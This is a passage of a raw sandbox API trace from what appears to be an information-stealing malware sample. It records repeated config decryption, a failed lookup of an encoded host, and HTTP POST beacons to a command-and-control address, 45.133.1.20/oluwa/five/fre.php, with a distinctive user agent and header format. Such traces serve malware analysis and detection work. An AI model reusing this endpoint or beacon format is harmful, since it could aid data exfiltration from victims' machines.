pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0178.269] GetProcessHeap () returned 0x6a0000 [0178.269] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0178.270] GetProcessHeap () returned 0x6a0000 [0178.270] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0178.270] GetProcessHeap () returned 0x6a0000 [0178.270] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0178.270] GetProcessHeap () returned 0x6a0000 [0178.270] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0178.273] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0178.274] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0178.280] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0178.280] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bec18) returned 1 [0178.291] GetProcessHeap () returned 0x6a0000 [0178.291] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0178.291] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0178.292] CryptImportKey (in: hProv=0x6bec18, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0178.293] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0178.293] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0178.294] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0178.294] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0178.294] GetProcessHeap () returned 0x6a0000 [0178.294] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0178.296] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0178.296] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0178.297] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0178.297] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0178.298] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0178.299] CryptReleaseContext (hProv=0x6bec18, dwFlags=0x0) returned 1 [0178.299] GetProcessHeap () returned 0x6a0000 [0178.299] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0178.300] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0178.300] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0178.301] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0178.301] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0178.302] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0178.302] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0178.303] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0178.303] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0178.303] GetProcessHeap () returned 0x6a0000 [0178.303] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0178.304] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b9ac8*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be9e8*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0178.304] GetProcessHeap () returned 0x6a0000 [0178.304] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9b0 [0178.304] socket (af=2, type=1, protocol=6) returned 0x3bc [0178.304] connect (s=0x3bc, name=0x6be9e8*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0178.333] FreeAddrInfoW (pAddrInfo=0x6b9ac8*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be9e8*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0178.333] GetProcessHeap () returned 0x6a0000 [0178.333] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0178.334] GetProcessHeap () returned 0x6a0000 [0178.334] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0178.334] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0178.335] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0178.336] GetProcessHeap () returned 0x6a0000 [0178.336] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0178.336] GetProcessHeap () returned 0x6a0000 [0178.336] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0178.336] GetProcessHeap () returned 0x6a0000 [0178.336] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4a30 [0178.336] GetProcessHeap () returned 0x6a0000 [0178.337] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0178.337] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0178.338] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0178.338] GetProcessHeap () returned 0x6a0000 [0178.338] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0178.338] GetProcessHeap () returned 0x6a0000 [0178.339] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0178.339] send (s=0x3bc, buf=0x6bbd20*, len=242, flags=0) returned 242 [0178.340] send (s=0x3bc, buf=0x6bb998*, len=159, flags=0) returned 159 [0178.340] GetProcessHeap () returned 0x6a0000 [0178.340] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0178.340] recv (in: s=0x3bc, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0178.440] GetProcessHeap () returned 0x6a0000 [0178.441] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0178.441] GetProcessHeap () returned 0x6a0000 [0178.442] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0178.442] GetProcessHeap () returned 0x6a0000 [0178.442] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0178.442] GetProcessHeap () returned 0x6a0000 [0178.443] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0178.443] closesocket (s=0x3bc) returned 0 [0178.444] GetProcessHeap () returned 0x6a0000 [0178.444] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9b0 | out: hHeap=0x6a0000) returned 1 [0178.444] GetProcessHeap () returned 0x6a0000 [0178.444] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0178.445] GetProcessHeap () returned 0x6a0000 [0178.445] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0178.445] GetProcessHeap () returned 0x6a0000 [0178.445] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0178.445] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x7ac) returned 0x3bc [0178.447] Sleep (dwMilliseconds=0xea60) [0178.449] GetProcessHeap () returned 0x6a0000 [0178.449] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0178.452] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0178.453] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0178.466] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0178.467] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0178.475] GetProcessHeap () returned 0x6a0000 [0178.475] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0178.476] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0178.476] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0178.477] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0178.477] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0178.485] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0178.485] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0178.486] GetProcessHeap () returned 0x6a0000 [0178.486] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0178.487] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0178.487] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0178.488] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0178.488] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0178.489] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0178.489] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0178.489] GetProcessHeap () returned 0x6a0000 [0178.489] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0178.490] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0178.490] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0178.491] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0178.491] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0178.491] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0178.492] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0178.493] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0178.493] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0178.493] GetProcessHeap () returned 0x6a0000 [0178.493] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0178.493] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0178.493] GetProcessHeap () returned 0x6a0000 [0178.494] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0178.494] GetProcessHeap () returned 0x6a0000 [0178.494] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0178.496] GetProcessHeap () returned 0x6a0000 [0178.497] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0178.497] GetProcessHeap () returned 0x6a0000 [0178.497] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0178.498] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0178.498] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0178.505] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0178.508] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bed28) returned 1 [0178.515] GetProcessHeap () returned 0x6a0000 [0178.515] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0178.516] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0178.516] CryptImportKey (in: hProv=0x6bed28, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad560) returned 1 [0178.517] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0178.517] CryptSetKeyParam (hKey=0x6ad560, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0178.518] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0178.518] CryptSetKeyParam (hKey=0x6ad560, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0178.518] GetProcessHeap () returned 0x6a0000 [0178.519] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0178.519] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0178.520] CryptDecrypt (in: hKey=0x6ad560, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0178.521] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0178.521] CryptDestroyKey (hKey=0x6ad560) returned 1 [0178.522] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0178.522] CryptReleaseContext (hProv=0x6bed28, dwFlags=0x0) returned 1 [0178.522] GetProcessHeap () returned 0x6a0000 [0178.522] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0178.523] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0178.523] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0178.524] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0178.524] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0178.525] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0178.525] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0178.526] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0178.526] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0178.526] GetProcessHeap () returned 0x6a0000 [0178.526] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0178.526] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b9e38*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea30*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0178.526] GetProcessHeap () returned 0x6a0000 [0178.526] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa20 [0178.526] socket (af=2, type=1, protocol=6) returned 0x3c0 [0178.527] connect (s=0x3c0, name=0x6bea30*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0178.552] FreeAddrInfoW (pAddrInfo=0x6b9e38*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea30*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0178.552] GetProcessHeap () returned 0x6a0000 [0178.552] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf278 [0178.552] GetProcessHeap () returned 0x6a0000 [0178.552] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0178.553] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0178.553] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0178.554] GetProcessHeap () returned 0x6a0000 [0178.554] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0178.554] GetProcessHeap () returned 0x6a0000 [0178.554] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0178.554] GetProcessHeap () returned 0x6a0000 [0178.554] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0178.554] GetProcessHeap () returned 0x6a0000 [0178.554] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0178.555] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0178.556] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0178.556] GetProcessHeap () returned 0x6a0000 [0178.556] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0178.556] GetProcessHeap () returned 0x6a0000 [0178.557] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0178.557] send (s=0x3c0, buf=0x6bbd20*, len=242, flags=0) returned 242 [0178.558] send (s=0x3c0, buf=0x6bb998*, len=159, flags=0) returned 159 [0178.558] GetProcessHeap () returned 0x6a0000 [0178.558] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0178.558] recv (in: s=0x3c0, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0178.622] GetProcessHeap () returned 0x6a0000 [0178.623] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0178.624] GetProcessHeap () returned 0x6a0000 [0178.624] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0178.624] GetProcessHeap () returned 0x6a0000 [0178.624] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0178.625] GetProcessHeap () returned 0x6a0000 [0178.625] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf278 | out: hHeap=0x6a0000) returned 1 [0178.625] closesocket (s=0x3c0) returned 0 [0178.625] GetProcessHeap () returned 0x6a0000 [0178.626] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa20 | out: hHeap=0x6a0000) returned 1 [0178.626] GetProcessHeap () returned 0x6a0000 [0178.626] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0178.626] GetProcessHeap () returned 0x6a0000 [0178.626] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0178.626] GetProcessHeap () returned 0x6a0000 [0178.627] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0178.627] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x34c) returned 0x3c0 [0178.632] Sleep (dwMilliseconds=0xea60) [0178.634] GetProcessHeap () returned 0x6a0000 [0178.634] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0178.635] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0178.635] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0178.654] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0178.654] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf0e0) returned 1 [0178.681] GetProcessHeap () returned 0x6a0000 [0178.681] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0178.682] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0178.683] CryptImportKey (in: hProv=0x6bf0e0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0178.684] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0178.684] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0178.685] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0178.686] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0178.686] GetProcessHeap () returned 0x6a0000 [0178.686] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0178.687] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0178.690] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0178.690] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0178.691] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0178.691] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0178.692] CryptReleaseContext (hProv=0x6bf0e0, dwFlags=0x0) returned 1 [0178.693] GetProcessHeap () returned 0x6a0000 [0178.693] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0178.693] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0178.694] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0178.695] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0178.695] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0178.696] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0178.696] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0178.697] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0178.698] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0178.698] GetProcessHeap () returned 0x6a0000 [0178.698] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0178.698] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0178.698] GetProcessHeap () returned 0x6a0000 [0178.698] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0178.699] GetProcessHeap () returned 0x6a0000 [0178.699] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0178.699] GetProcessHeap () returned 0x6a0000 [0178.699] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0178.699] GetProcessHeap () returned 0x6a0000 [0178.700] RtlAllocateHeap (HeapHandle=0x6a0000, 